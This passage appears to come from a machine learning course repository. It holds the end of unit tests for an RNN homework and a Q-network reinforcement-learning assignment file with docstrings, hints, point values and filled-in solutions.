[0.3,0.6,0.9],
])
# hidden states of 2 neurons after the previous step t-1
# h = 2
ht_1 = th.tensor([[ 0.5,-0.4], # the hidden states for the first time sequence in the mini-batch
[-0.3, 0.6]], # the hidden states for the second time sequence in the mini-batch
requires_grad=True)
U = th.tensor([[1.,2.],
[3.,4.],
[5.,6.]],
requires_grad=True)
V = th.tensor([[1.,-2.],
[3.,-4.]],
requires_grad=True)
b_h = th.tensor([1., # bias for the first hidden state
-1.], # bias for the second hidden state
requires_grad=True)
zt = compute_zt(xt,ht_1,U,V,b_h)
# check if the values are correct
assert type(zt) == th.Tensor
assert np.allclose(zt.size(),(2,2))
zt_true= [[4.7, 5.2],
[9.1, 5.6]]
assert np.allclose(zt.data,zt_true, atol = 0.1)
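    # (Quick check, assuming zt = xt @ U + ht_1 @ V + b_h: for the first sequence,
    #  zt[0,0] = (0.2*1 + 0.4*3 + 0.6*5) + (0.5*1 - 0.4*3) + 1 = 4.4 - 0.7 + 1 = 4.7.)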
# check if the gradients are connected correctly
# create a simple loss function (sum of all elements in z)
L = zt.sum()
# back propagation
L.backward()
# the gradient for ht_1
dL_dh_t_1 = [[-1., -1.],
[-1., -1.]]
dL_dU = [[0.5, 0.5],
[1.0, 1.0],
[1.5, 1.5]]
dL_dV = [[0.2, 0.2],
[0.2, 0.2]]
assert np.allclose(ht_1.grad, dL_dh_t_1, atol= 0.1)
assert np.allclose(U.grad, dL_dU, atol= 0.1)
assert np.allclose(V.grad, dL_dV, atol= 0.1)
assert np.allclose(b_h.grad, [2,2], atol= 0.1)
# test the function with random input sizes
h = np.random.randint(2,10) # number of hidden states
p = np.random.randint(2,10) # number of input features at each time step
n = np.random.randint(2,10) # number of sequences in a mini-batch
xt = th.randn(n,p)
U = th.randn(p,h)
V = th.randn(h,h)
b_h = th.randn(h)
ht_1 = th.randn(n,h)
zt = compute_zt(xt,ht_1,U,V,b_h)
assert np.allclose(zt.size(),(n,h))
#---------------------------------------------------
def test_compute_ht():
''' (2 points) compute_ht'''
# 2 time sequences in a mini-batch at the current time step t, with 3 hidden states (neurons)
# n = 2, h = 3
zt = th.tensor([
#---------- the hidden states for the first time sequence in the mini-batch at time step t ------
[0.0, 0.2, 1000.],
#---------- the hidden states for the second time sequence in the mini-batch at time step t ------
[0.5,-0.2,-1000.],
], requires_grad=True)
ht = compute_ht(zt)
assert type(ht) == th.Tensor
ht_true =[[ 0.0000, 0.1974, 1.],
[ 0.4621, -0.1974, -1.]]
assert np.allclose(ht.data,ht_true,atol=1e-2)
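    # (These values are consistent with ht = tanh(zt): tanh(0.2) ~ 0.1974, tanh(0.5) ~ 0.4621,
    #  and the +/-1000 entries saturate to +/-1; the gradient check below matches 1 - tanh(zt)^2.)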
# check if the gradients are connected correctly
# create a simple loss function (sum of all elements in h)
L = ht.sum()
# back propagation
L.backward()
# the gradient for zt
dL_dz_t = [[1.0000, 0.961, 0.],
[0.7864, 0.961, 0.]]
assert np.allclose(zt.grad, dL_dz_t, atol= 0.01)
# test the function with random input sizes
h = np.random.randint(2,10) # number of hidden states
n = np.random.randint(2,10) # number of sequences in a mini-batch
zt = th.randn(n,h)
ht = compute_ht(zt)
assert np.allclose(ht.size(),(n,h))
#---------------------------------------------------
def test_step():
''' (2 points) step'''
# 2 time sequences of 3 input features at the current time step t
# n = 2, p = 3
xt = th.tensor([
#---------- the first time sequence in the mini-batch at time step t ------
[0.2,0.4,0.6],
#---------- the second time sequence in the mini-batch at time step t ------
[0.3,0.6,0.9],
])
U = th.tensor([[ 0.1,-0.2],
[-0.3, 0.4],
[ 0.5,-0.6]],
requires_grad=True)
V = th.tensor([[0.1,-0.2],
[0.3,-0.4]],
requires_grad=True)
b_h = th.tensor([0.2,-0.2], requires_grad=True)
# hidden states of 2 neurons after the previous step t-1
# h = 2
ht_1 = th.tensor([[ 0.5,-0.4], # the hidden states for the first time sequence in the mini-batch
[-0.3, 0.6]], # the hidden states for the second time sequence in the mini-batch
requires_grad=True)
ht = step(xt,ht_1,U,V,b_h)
# check if the values are correct
assert type(ht) == th.Tensor
assert np.allclose(ht.size(),(2,2))
ht_true= [[ 0.3185, -0.3627],
[ 0.5717, -0.6291]]
assert np.allclose(ht.data,ht_true, atol = 0.1)
# check if the gradients are connected correctly
# create a simple loss function (sum of all elements in ht)
L = ht.sum()
# back propagation
L.backward()
# the gradient for ht_1
dL_dh_t_1 = [[-0.0838, -0.0778],
[-0.0535, -0.0397]]
dL_dU = [[0.3817, 0.3549],
[0.7633, 0.7099],
[1.1450, 1.0648]]
dL_dV = [[0.2473, 0.2530],
[0.0445, 0.0151]]
dL_db_h = [1.5717, 1.4726]
assert np.allclose(ht_1.grad, dL_dh_t_1, atol= 0.01)
assert np.allclose(U.grad, dL_dU, atol= 0.01)
assert np.allclose(V.grad, dL_dV, atol= 0.01)
assert np.allclose(b_h.grad, dL_db_h, atol= 0.01)
# test the function with random input sizes
h = np.random.randint(2,10) # number of hidden states
p = np.random.randint(2,10) # number of input features at each time step
n = np.random.randint(2,10) # number of sequences in a mini-batch
xt = th.randn(n,p)
U = th.randn(p,h)
V = th.randn(h,h)
b_h = th.randn(h)
ht_1 = th.randn(n,h)
    ht = step(xt,ht_1,U,V,b_h)
    assert np.allclose(ht.size(),(n,h))
#---------------------------------------------------
def test_compute_z():
''' (2 points) compute_z'''
# 2 time sequences in a mini-batch at the current time step t, with 3 hidden states (neurons)
# n = 2, c = 3
ht = th.tensor([
#---------- the hidden states for the first time sequence in the mini-batch at the last time step t ------
[0.0, 0.2, 1.],
#---------- the hidden states for the second time sequence in the mini-batch at the last time step t ------
[0.5,-0.2,-1.],
], requires_grad=True)
W = th.tensor([1., 2., -3.], requires_grad=True)
b = th.tensor(1., requires_grad=True)
z = compute_z(ht,W,b)
assert type(z) == th.Tensor
assert np.allclose(z.size(),(2,))
assert np.allclose(z.data,[-1.6, 4.1],atol=1e-2)
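    # (Quick check, assuming z = ht @ W + b: for the first sequence,
    #  0*1 + 0.2*2 + 1*(-3) + 1 = -1.6, matching the first expected value.)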
# check if the gradients are connected correctly
    # create a simple loss function (sum of all elements in z)
L = z.sum()
# back propagation
L.backward()
    # the gradient for ht
dL_dh_t = [[ 1., 2., -3.],
[ 1., 2., -3.]]
assert np.allclose(ht.grad, dL_dh_t, atol= 0.01)
# test the function with random input sizes
h = np.random.randint(2,10) # number of hidden states
n = np.random.randint(2,10) # number of sequences in a mini-batch
ht = th.randn(n,h)
W = th.randn(h)
b = th.randn(1)
z = compute_z(ht,W,b)
assert np.allclose(z.size(),(n,))
#---------------------------------------------------
def test_forward():
''' (2 points) forward'''
# 2 time sequences of 3 time steps with 2 input features at each time step
# n = 2, l=3 p = 2
x = th.tensor([
#---------- the first time sequence in the mini-batch ------
[
[1.,0.], # the first time step of the time sequence
[0.,1.], # the second time step of the time sequence
[1.,0.] # the third time step of the time sequence
],
#---------- the second time sequence in the mini-batch ------
[
[1.,0.], # the first time step of the time sequence
[1.,0.], # the second time step of the time sequence
[0.,1.] # the third time step of the time sequence
]
#------------------------------------------------------------
])
#---------------------------
# Layer 1: Recurrent layer
#---------------------------
# 4 hidden states
# h = 4 (p=2)
U = th.tensor([[ 2.1, 2.2, 2.3, 2.4],
[-1.1,-1.2,-2.3,-2.4]],
requires_grad=True)
V = th.tensor([[0.0,-1.0, 0.0, 0.0],
[0.0, 0.0,-1.0, 0.0],
[0.0, 0.0, 0.0, 1.0],
[0.0, 0.0, 0.0, 0.0]],
requires_grad=True)
b_h = th.tensor([-0.1,0.1,-0.1,0.1], requires_grad=True)
# initial hidden states of 4 neurons on 2 time sequences
ht = th.zeros(2,4, requires_grad=True)
#---------------------------
# Layer 2: Fully-connected layer
#---------------------------
W = th.tensor([-1., 1., -1., 1.], requires_grad=True)
b = th.tensor(0., requires_grad=True)
z = forward(x,ht,U,V,b_h,W,b)
assert type(z) == th.Tensor
assert np.allclose(z.size(),(2,))
assert np.allclose(z.data,[-0.0587, -0.0352], atol=1e-2)
# check if the gradients are connected correctly
    # create a simple loss function (sum of all elements in z)
L = z.sum()
# back propagation
L.backward()
# the gradient for the parameters
dL_dW = [ 0.1304, 0.0279, -0.0007, 0.0078]
dL_db = 2.
dL_dU = [[-0.0752, 0.0067, 0.0502, 0.1800],
[-0.3073, 0.0629, -0.0049, 0.1941]]
dL_dV = [[-0.2416, 0.0556, 0.0563, 0.0371],
[-0.2038, 0.0488, 0.0588, -0.0052],
[-0.1922, 0.0467, 0.0589, -0.0166],
[-0.2497, 0.0576, 0.0577, 0.0375]]
dL_dbh = [-0.3825, 0.0695, 0.0453, 0.3740]
assert np.allclose(W.grad, dL_dW, atol= 0.01)
assert np.allclose(b.grad, dL_db, atol= 0.01)
assert np.allclose(U.grad, dL_dU, atol= 0.01)
assert np.allclose(V.grad, dL_dV, atol= 0.01)
assert np.allclose(b_h.grad, dL_dbh, atol= 0.01)
# test the function with random input sizes
h = np.random.randint(2,10) # number of hidden states
l = np.random.randint(2,10) # number of time steps in a sequence
p = np.random.randint(2,10) # number of input features at each time step
n = np.random.randint(2,10) # number of sequences in a mini-batch
x = th.randn(n,l,p)
ht = th.randn(n,h)
U = th.randn(p,h)
V = th.randn(h,h)
b_h = th.randn(h)
W = th.randn(h)
b = th.randn(1)
z = forward(x,ht,U,V,b_h,W,b)
assert np.allclose(z.size(),(n,))
#---------------------------------------------------
def test_compute_L():
''' (2 points) compute_L'''
# batch_size = 4
# linear logits in a mini-batch
z = th.tensor([1.,-1., -1000, 1000.], requires_grad=True)
# the labels of the mini-batch: vector of length 4 (batch_size)
y = th.Tensor([0,1,0,1])
L = compute_L(z,y)
assert type(L) == th.Tensor
assert L.requires_grad
assert np.allclose(L.detach().numpy(),0.6566,atol=1e-4)
# check if the gradients of z is connected to L correctly
    L.backward() # back propagate gradient to z
dL_dz_true = [ 0.1828, -0.1828, 0., 0.]
assert np.allclose(z.grad,dL_dz_true, atol=0.01)
#-----------------------------------------
# batch_size = 2
# linear logits in a mini-batch
z = th.tensor([-1000., 1000.], requires_grad=True)
y = th.Tensor([1,0])
L = compute_L(z,y)
assert L.data >100
assert L.data < float('inf')
    L.backward() # back propagate gradient to z
assert z.grad[0]<0
assert z.grad[1]>0
#---------------------------------------------------
def test_update_parameters():
''' (2 points) update_parameters'''
#---------------------------
# Layer 1: Recurrent layer
#---------------------------
# 4 hidden states
# h = 4 (p=2)
U = th.tensor([[ 2.1, 2.2, 2.3, 2.4],
[-1.1,-1.2,-2.3,-2.4]],
requires_grad=True)
V = th.tensor([[1.0,-1.0, 0.0, 0.0],
[1.0, 0.0,-1.0, 0.0],
[1.0, 0.0, 0.0, 1.0],
[1.0, 0.0, 0.0, 0.0]],
requires_grad=True)
b_h = th.tensor([-0.1,0.1,-0.1,0.1], requires_grad=True)
#---------------------------
# Layer 2: Fully-connected layer
#---------------------------
W = th.tensor([-1., 1., -1., 1.], requires_grad=True)
b = th.tensor(0., requires_grad=True)
# create a toy loss function: the sum of all elements in all parameters
L = W.sum()+ b + U.sum() + V.sum() + b_h.sum()
# back propagation to compute the gradients
L.backward()
# now the gradients for all parameters should be all-ones
# let's try updating the parameters with gradient descent
# create an optimizer for the parameters with learning rate = 0.1
optimizer = th.optim.SGD([U,V,b_h,W,b], lr=0.1)
# now perform gradient descent using SGD
update_parameters(optimizer)
# let's check the new values of the parameters
U_new = [[ 2.0, 2.1, 2.2, 2.3],
[-1.2, -1.3, -2.4, -2.5]]
V_new = [[ 0.9, -1.1, -0.1, -0.1],
[ 0.9, -0.1, -1.1, -0.1],
[ 0.9, -0.1, -0.1, 0.9],
[ 0.9, -0.1, -0.1, -0.1]]
b_h_new = [-0.2, 0.0, -0.2, 0.0]
W_new = [-1.1, 0.9, -1.1, 0.9]
assert np.allclose(U.data,U_new,atol=1e-2)
assert np.allclose(V.data,V_new,atol=1e-2)
assert np.allclose(b_h.data,b_h_new,atol=1e-2)
assert np.allclose(W.data,W_new,atol=1e-2)
assert np.allclose(b.data,-0.1,atol=1e-2)
assert np.allclose(U.grad,np.zeros((2,4)),atol=1e-2)
assert np.allclose(V.grad,np.zeros((4,4)),atol=1e-2)
assert np.allclose(b_h.grad,np.zeros(4),atol=1e-2)
assert np.allclose(W.grad,np.zeros(4),atol=1e-2)
assert np.allclose(b.grad,0,atol=1e-2)
#---------------------------------------------------
def test_train():
''' (4 points) train'''
# n = 4, l=3, p = 2
X = [
[ # instance 0
[0.,0.], # time step 0
[0.,0.], # time step 1
[0.,0.] # time step 2
],
[ # instance 1
[0.,0.],
[0.,0.],
[0.,1.]
],
[ # instance 2
[0.,0.],
[1.,0.],
[0.,0.]
],
[ # instance 3
[0.,1.],
[0.,0.],
[0.,0.]
]
]
Y = [0,0,1,1]
class toy(Dataset):
def __init__(self):
self.X = th.Tensor(X)
self.Y = th.Tensor(Y)
def __len__(self):
return 4
def __getitem__(self, idx):
return self.X[idx], self.Y[idx]
d = toy()
h=32
n=2
loader = th.utils.data.DataLoader(d, batch_size = n,shuffle=True)
U,V,b_h,W,b = train(loader,p=2,h=h,n = n,n_epoch=100)
ht = th.zeros(4,h) # initialize the hidden states as all zero
z = forward(th.Tensor(X),ht,U,V,b_h,W,b)
assert z[0] < z[2]
assert z[1] < z[2]
assert z[0] < z[3]
assert z[1] < z[3]
#---------------------------------------------------
def test_predict():
''' (2 points) predict'''
# n = 4, l=3, p = 2
X = [
[ # instance 0
[0.,0.], # time step 0
[0.,0.], # time step 1
[0.,0.] # time step 2
],
[ # instance 1
[0.,0.],
[0.,0.],
[0.,1.]
],
[ # instance 2
[0.,0.],
[1.,0.],
[0.,0.]
],
[ # instance 3
[0.,1.],
[0.,0.],
[0.,0.]
]
]
Y = [0,0,1,1]
class toy(Dataset):
def __init__(self):
self.X = th.Tensor(X)
self.Y = th.Tensor(Y)
def __len__(self):
return 4
def __getitem__(self, idx):
return self.X[idx], self.Y[idx]
d = toy()
h=32
n=2
loader = th.utils.data.DataLoader(d, batch_size = n,shuffle=True)
U,V,b_h,W,b = train(loader,p=2,h=h,n = n,n_epoch=300)
y_predict = predict(th.Tensor(X),U,V,b_h,W,b)
assert np.allclose(y_predict, Y)
```
#### File: CS-539-Machine-Learning/homework4/problem3.py
```python
import numpy as np
import torch as th
from problem2 import random_policy
# Note: please don't import any new package. You should solve this problem using only the package(s) above.
#-------------------------------------------------------------------------
'''
Problem 3: Q Network (35 points)
In this problem, you will implement a neural network (with one fully-connected layer only) to estimate Q values in a game
A list of all variables being used in this problem is provided at the end of this file.
'''
#----------------------------------------------------
'''
    (Training: estimate Q values using Q network) Given a Q network with parameters (W, b) and a mini-batch of sampled game states S, please compute the predicted Q values on the mini-batch of samples.
---- Inputs: --------
* S: the current states for a mini-batch of sampled game steps, a torch tensor of shape (n,p), where S[i] is the current game state in the i-th sample in the mini-batch.
* W: the weights of fully connected layer of Q network, which is used to predict the Q values of each game state, a float torch matrix of shape (p,c).
* b: the biases of fully connected layer of Q network, a float torch vector of length c.
---- Outputs: --------
* Q: the predicted Q values by the Q network on all actions for a mini-batch of game state samples, a pytorch matrix of shape (n, c). Q[i,j] represents the Q value on the j-th action for the i-th sample in the mini-batch.
---- Hints: --------
* This problem can be solved using 1 line(s) of code.
'''
#---------------------
def compute_Q(S, W, b):
#########################################
## INSERT YOUR CODE HERE (2 points)
Q = S@W + b
#########################################
return Q
#-----------------
'''
TEST: Now you can test the correctness of your code above by typing the following in the terminal:
---------------------------------------------------
nosetests -v test3.py:test_compute_Q
--- OR ----
python3 -m nose -v test3.py:test_compute_Q
--- OR ----
python -m nose -v test3.py:test_compute_Q
---------------------------------------------------
'''
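# A minimal usage sketch (shapes and values below are made up for illustration only):
#   S = th.zeros(4, 3)        # n=4 sampled states, p=3 features each
#   W = th.zeros(3, 2)        # c=2 actions
#   b = th.zeros(2)
#   compute_Q(S, W, b)        # -> a (4, 2) tensor of predicted Q values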
#----------------------------------------------------
'''
    (Training: compute Target Q values using Bellman Optimality Equation) Suppose we have a mini-batch of training samples, including the new/next game states S_new and the immediate rewards R of the sampled game steps in the mini-batch. Please compute the target Q values (Qt) for the mini-batch of samples using the Bellman Optimality Equation. Note that gradients cannot flow through Qt, i.e., the Qt tensor should not be connected to the parameters W and b in the computational graph.
---- Inputs: --------
    * S_new: the new/next game states for a mini-batch of sampled game steps after state transition, a torch tensor of shape (n,p). S_new[i] is the next/new game state in the i-th sample of the mini-batch.
* R: a mini-batch of the immediate rewards returned after the transition, a float vector of length (n). R[i] is the received immediate reward of the i-th sampled game step in the mini-batch.
    * T: whether or not the new/next game state is a terminal state in a mini-batch of sampled game steps, a boolean torch tensor of length n. T[i] = True if S_new[i] is a terminal state in the game (where the game ends).
* W: the weights of fully connected layer of Q network, which is used to predict the Q values of each game state, a float torch matrix of shape (p,c).
* b: the biases of fully connected layer of Q network, a float torch vector of length c.
* gamma: the discount factor, a float scalar between 0 and 1.
---- Outputs: --------
* Qt: the target Q values (estimated by Bellman Optimality Equation with the target Q network) for a mini-batch of samples, a pytorch vector of length (n). Qt[i] represents the target Q value for the i-th sample in the mini-batch.
---- Hints: --------
* (Step 1) compute Q values on the new/next game states.
* (Step 2.1) If S_new[i] is a terminal state (i.e., T[i] = True), use the immediate reward R[i] as the target reward.
* (Step 2.2) Otherwise, use Bellman Optimality Equation to estimate the target Q value.
* You could re-use compute_Q() function.
* To detach the gradients of a torch tensor x, you could use x.detach(), so that gradient will not flow through x.
* To negate the boolean values in a tensor x, you could use ~x.
* To convert a boolean-valued tensor x into an integer tensor, you could use x.int().
* To compute the max value of a tensor, you could use th.max() function.
* This problem can be solved using 2 line(s) of code.
'''
#---------------------
def compute_Qt(S_new, R, T, W, b, gamma=0.95):
#########################################
## INSERT YOUR CODE HERE (5 points)
    new_Q = compute_Q(S_new, W, b).detach()  # Q values on the new/next states; detach so no gradient flows back into W, b
    Qt = R + gamma * th.max(new_Q, dim=1)[0] * (~T).int()  # Bellman target; for terminal states only the immediate reward remains
#########################################
return Qt
#-----------------
'''
TEST: Now you can test the correctness of your code above by typing the following in the terminal:
---------------------------------------------------
nosetests -v test3.py:test_compute_Qt
--- OR ----
python3 -m nose -v test3.py:test_compute_Qt
--- OR ----
python -m nose -v test3.py:test_compute_Qt
---------------------------------------------------
'''
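# A worked example of the Bellman target (values made up for illustration), with gamma = 0.95:
# if sample i is non-terminal (T[i] = False) with R[i] = 1 and the largest Q value on S_new[i]
# is 2, then Qt[i] = 1 + 0.95 * 2 = 2.9; if sample i is terminal (T[i] = True), Qt[i] = R[i].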
#----------------------------------------------------
'''
(Training: Loss function) Given estimated Q values by the Q network, the action chosen and the target Q values on a mini-batch of sampled game steps, please compute the mean-squared-error loss on the mini-batch of samples.
---- Inputs: --------
* Q: the predicted Q values by the Q network on all actions for a mini-batch of game state samples, a pytorch matrix of shape (n, c). Q[i,j] represents the Q value on the j-th action for the i-th sample in the mini-batch.
* A: a mini-batch of the actions chosen by the player, an integer vector of length (n).
* Qt: the target Q values (estimated by Bellman Optimality Equation with the target Q network) for a mini-batch of samples, a pytorch vector of length (n). Qt[i] represents the target Q value for the i-th sample in the mini-batch.
---- Outputs: --------
    * L: the average of the least square losses on a mini-batch of training samples, a torch float scalar.
---- Hints: --------
* You could use arange(n) function in Pytorch to create an index list of [0,1,2,...,n-1].
* You could use y = X[list1,list2] to select elements of matrix X into a vector. For example if list1=[1,3,5], list2=[2,4,6], then y will be a list of [ X[1,2], X[3,4], X[5,6] ].
* You could use MSELoss in Pytorch to compute the mean squared error.
* This problem can be solved using 2 line(s) of code.
'''
#---------------------
def compute_L(Q, A, Qt):
#########################################
    ## INSERT YOUR CODE HERE (5 points)
    # select the Q value of the action actually taken in each sample, then average the squared errors
    n = Q.shape[0]
    L = th.nn.MSELoss()(Q[th.arange(n), A], Qt)
#########################################
return L
#-----------------
'''
TEST: Now you can test the correctness of your code above by typing the following in the terminal:
---------------------------------------------------
nosetests -v test3.py:test_compute_L
--- OR ----
python3 -m nose -v test3.py:test_compute_L
--- OR ----
python -m nose -v test3.py:test_compute_L
---------------------------------------------------
'''
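# A small worked example (made-up values): with Q = [[1., 2.], [3., 4.]], A = [1, 0] and
# Qt = [2., 2.], the Q values of the chosen actions are [2., 3.], so the mean squared error
# is ((2 - 2)^2 + (3 - 2)^2) / 2 = 0.5.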
#----------------------------------------------------
'''
(Training: Gradient Descent) Suppose we are given a Q neural network with parameters (W, b) and we have a mini-batch of training samples (S,A,S_new,R). Suppose we have already computed the global gradients of the loss L w.r.t. the weights W and biases b on the mini-batch of samples. Assume that we have already created an optimizer for the parameter W and b. Please update the weights W and biases b using gradient descent. After the update, the global gradients of W and b should be set to all zeros.
---- Inputs: --------
* optimizer: a PyTorch optimizer (such as SGD, ADAM, RMSProp) to handle the gradient descent for all the parameters in the model (W and b).
---- Hints: --------
* This problem can be solved using 2 line(s) of code.
'''
#---------------------
def update_parameters(optimizer):
#########################################
## INSERT YOUR CODE HERE (2 points)
optimizer.step()
optimizer.zero_grad()
#########################################
#-----------------
'''
TEST: Now you can test the correctness of your code above by typing the following in the terminal:
---------------------------------------------------
nosetests -v test3.py:test_update_parameters
--- OR ----
python3 -m nose -v test3.py:test_update_parameters
--- OR ----
python -m nose -v test3.py:test_update_parameters
---------------------------------------------------
'''
#----------------------------------------------------
'''
(Training: Train Q Network on a mini-batch of samples) Given a mini-batch of training samples: S (current game states), A (actions chosen), S_new (new/next game states) and R (immediate rewards), suppose the target Q values are already computed (Qt), please train the Q network using gradient descent: update the weights W and biases b using the gradients on the mini-batch of data samples.
---- Inputs: --------
* S: the current states for a mini-batch of sampled game steps, a torch tensor of shape (n,p), where S[i] is the current game state in the i-th sample in the mini-batch.
* A: a mini-batch of the actions chosen by the player, an integer vector of length (n).
* Qt: the target Q values (estimated by Bellman Optimality Equation with the target Q network) for a mini-batch of samples, a pytorch vector of length (n). Qt[i] represents the target Q value for the i-th sample in the mini-batch.
* W: the weights of fully connected layer of Q network, which is used to predict the Q values of each game state, a float torch matrix of shape (p,c).
* b: the biases of fully connected layer of Q network, a float torch vector of length c.
* optimizer: a PyTorch optimizer (such as SGD, ADAM, RMSProp) to handle the gradient descent for all the parameters in the model (W and b).
---- Hints: --------
* Step 1 Forward pass: compute estimated Q values, target Q values and the loss L.
* Step 2 Back propagation: compute the gradients of W and b.
* Step 3 Gradient descent: update the parameters W and b using gradient descent.
* This problem can be solved using 4 line(s) of code.
'''
#---------------------
def update_Q(S, A, Qt, W, b, optimizer):
#########################################
    ## INSERT YOUR CODE HERE (5 points)
    Q = compute_Q(S, W, b)           # Step 1: forward pass to get predicted Q values
    L = compute_L(Q, A, Qt)          # Step 1 (cont.): loss against the target Q values
    L.backward()                     # Step 2: back propagation to get gradients of W and b
    update_parameters(optimizer)     # Step 3: gradient descent update (also resets the gradients)
#########################################
#-----------------
'''
TEST: Now you can test the correctness of your code above by typing the following in the terminal:
---------------------------------------------------
nosetests -v test3.py:test_update_Q
--- OR ----
python3 -m nose -v test3.py:test_update_Q
--- OR ----
python -m nose -v test3.py:test_update_Q
---------------------------------------------------
'''
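# A minimal usage sketch (made-up setup): with W, b created with requires_grad=True and
#   optimizer = th.optim.SGD([W, b], lr=0.1)
# a single call update_Q(S, A, Qt, W, b, optimizer) performs one gradient-descent step on the
# mini-batch; Qt acts as a constant target because its gradients were detached when it was built.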
#----------------------------------------------------
'''
    (Sampling: using Q network for playing the game) Given the Q network with parameters W and b, and only the current state s of the game, please compute the estimated Q values on the current game state.
---- Inputs: --------
* s: the current state of the game, a torch vector of length p.
* W: the weights of fully connected layer of Q network, which is used to predict the Q values of each game state, a float torch matrix of shape (p,c).
* b: the biases of fully connected layer of Q network, a float torch vector of length c.
---- Outputs: --------
* q: the Q values estimated by the Q-network on all actions for the current step of the game, a torch vector of length c. q[i] represents the estimated Q value for the i-th action.
---- Hints: --------
* You could re-use the compute_Q() function above by creating a mini-batch of only one sample.
* To add a dimension to a torch tensor, you could use unsqueeze() function in torch tensor.
* To delete a dimension to a torch tensor, you could use squeeze() function in torch tensor.
* This problem can be solved using 1 line(s) of code.
'''
#---------------------
def predict_q(s, W, b):
#########################################
    ## INSERT YOUR CODE HERE (3 points)
    q = compute_Q(s.unsqueeze(0), W, b).squeeze(0)  # treat s as a mini-batch with a single sample
#########################################
return q
#-----------------
'''
TEST: Now you can test the correctness of your code above by typing the following in the terminal:
---------------------------------------------------
nosetests -v test3.py:test_predict_q
--- OR ----
python3 -m nose -v test3.py:test_predict_q
--- OR ----
python -m nose -v test3.py:test_predict_q
---------------------------------------------------
'''
#----------------------------------------------------
'''
(Sampling: Policy 1: greedy on Q) Given the Q values estimated by the Q network on the current game state s, choose an action using greedy policy on the Q values. Choose the action with the largest Q value for state s.
---- Inputs: --------
* q: the Q values estimated by the Q-network on all actions for the current step of the game, a torch vector of length c. q[i] represents the estimated Q value for the i-th action.
---- Outputs: --------
* a: the index of the action being chosen by the player at the current step, an integer scalar between 0 and c-1.
---- Hints: --------
    * You could use the argmax() function in torch to return the index of the largest value in a vector.
* This problem can be solved using 1 line(s) of code.
'''
#---------------------
def greedy_policy(q):
#########################################
## INSERT YOUR CODE HERE (2 points)
a = np.argmax(q.detach())
#########################################
return a
#-----------------
'''
TEST: Now you can test the correctness of your code above by typing the following in the terminal:
---------------------------------------------------
nosetests -v test3.py:test_greedy_policy
--- OR ----
python3 -m nose -v test3.py:test_greedy_policy
--- OR ----
python -m nose -v test3.py:test_greedy_policy
---------------------------------------------------
'''
#----------------------------------------------------
'''
(Sampling: Policy 2: epsilon-greedy on Q) Given the Q values estimated by the Q network on the current game state s, choose an action using epsilon-greedy policy on the Q values.
---- Inputs: --------
* q: the Q values estimated by the Q-network on all actions for the current step of the game, a torch vector of length c. q[i] represents the estimated Q value for the i-th action.
* e: (epsilon) the probability of the player to follow the random policy in epsilon-greedy method. e is a float scalar between 0 and 1. The player has 1-e probability in each time step to follow the greedy policy on the Q values.
---- Outputs: --------
* a: the index of the action being chosen by the player at the current step, an integer scalar between 0 and c-1.
---- Hints: --------
* You could re-use the random_policy() implemented in problem 2.
* You could use the random.rand() function in numpy to sample a number randomly using uniform distribution between 0 and 1.
* This problem can be solved using 1 line(s) of code.
'''
#---------------------
def egreedy_policy(q, e):
#########################################
## INSERT YOUR CODE HERE (3 points)
a = random_policy(q.shape[0]) if np.random.random() < e else np.argmax(q.detach())
#########################################
return a
#-----------------
'''
TEST: Now you can test the correctness of your code above by typing the following in the terminal:
---------------------------------------------------
nosetests -v test3.py:test_egreedy_policy
--- OR ----
python3 -m nose -v test3.py:test_egreedy_policy
--- OR ----
python -m nose -v test3.py:test_egreedy_policy
---------------------------------------------------
'''
#----------------------------------------------------
'''
(Sampling: Sample an action) Given the current game state s, sample an action using epsilon-greedy method on the Q values estimated by the Q network. We have epsilon probability to follow the random policy (randomly pick an action with uniform distribution) and (1-epsilon) probability to follow the greedy policy on Q values (pick the action according to the largest Q value for the current game state s).
---- Inputs: --------
* s: the current state of the game, a torch vector of length p.
* W: the weights of fully connected layer of Q network, which is used to predict the Q values of each game state, a float torch matrix of shape (p,c).
* b: the biases of fully connected layer of Q network, a float torch vector of length c.
* e: (epsilon) the probability of the player to follow the random policy in epsilon-greedy method. e is a float scalar between 0 and 1. The player has 1-e probability in each time step to follow the greedy policy on the Q values.
---- Outputs: --------
* a: the index of the action being chosen by the player at the current step, an integer scalar between 0 and c-1.
---- Hints: --------
* (Step 1) use the Q network to predict the Q values for the current game state.
* (Step 2) use epsilon-greedy policy on the Q values to sample an action.
* This problem can be solved using 2 line(s) of code.
'''
#---------------------
def sample_action(s, W, b, e):
#########################################
    ## INSERT YOUR CODE HERE (8 points)
    q = predict_q(s, W, b)     # Step 1: estimate the Q values for the current state
    a = egreedy_policy(q, e)   # Step 2: epsilon-greedy action selection on those Q values
#########################################
return a
#-----------------
'''
TEST: Now you can test the correctness of your code above by typing the following in the terminal:
---------------------------------------------------
nosetests -v test3.py:test_sample_action
--- OR ----
python3 -m nose -v test3.py:test_sample_action
--- OR ----
python -m nose -v test3.py:test_sample_action
---------------------------------------------------
'''
#--------------------------------------------
'''
TEST problem 3:
Now you can test the correctness of all the above functions by typing the following in the terminal:
---------------------------------------------------
nosetests -v test3.py
--- OR ----
python3 -m nose -v test3.py
--- OR ----
python -m nose -v test3.py
---------------------------------------------------
If your code passed all the tests, you will see the following message in the terminal:
----------- Problem 3 (35 points in total)--------------------- ... ok
* (2 points) compute_Q ... ok
* (5 points) compute_Qt ... ok
* (5 points) compute_L ... ok
* (2 points) update_parameters ... ok
* (5 points) update_Q ... ok
* (3 points) predict_q ... ok
* (2 points) greedy_policy ... ok
* (3 points) egreedy_policy ... ok
* (8 points) sample_action ... ok
----------------------------------------------------------------------
Ran 9 tests in 4.785s
OK
'''
#--------------------------------------------
#--------------------------------------------
'''
List of All Variables
* n: the number of game-step samples in a mini-batch, an integer scalar.
* p: the number of features in a game state, an integer scalar.
* c: the number of possible actions in the game, an integer scalar.
* W: the weights of fully connected layer of Q network, which is used to predict the Q values of each game state, a float torch matrix of shape (p,c).
* b: the biases of fully connected layer of Q network, a float torch vector of length c.
    * L: the average of the least square losses on a mini-batch of training samples, a torch float scalar.
* lr: learning rate for gradient descent, a float scalar, between 0 and 1.
* optimizer: a PyTorch optimizer (such as SGD, ADAM, RMSProp) to handle the gradient descent for all the parameters in the model (W and b).
* Q: the predicted Q values by the Q network on all actions for a mini-batch of game state samples, a pytorch matrix of shape (n, c). Q[i,j] represents the Q value on the j-th action for the i-th sample in the mini-batch.
* Q_new: the Q values (estimated by the target Q network) on the new game states for a mini-batch of sampled game steps, a pytorch matrix of shape (n, c). Q_new[i,j] represents the Q value on the j-th action for the new game state in the i-th sample of the mini-batch.
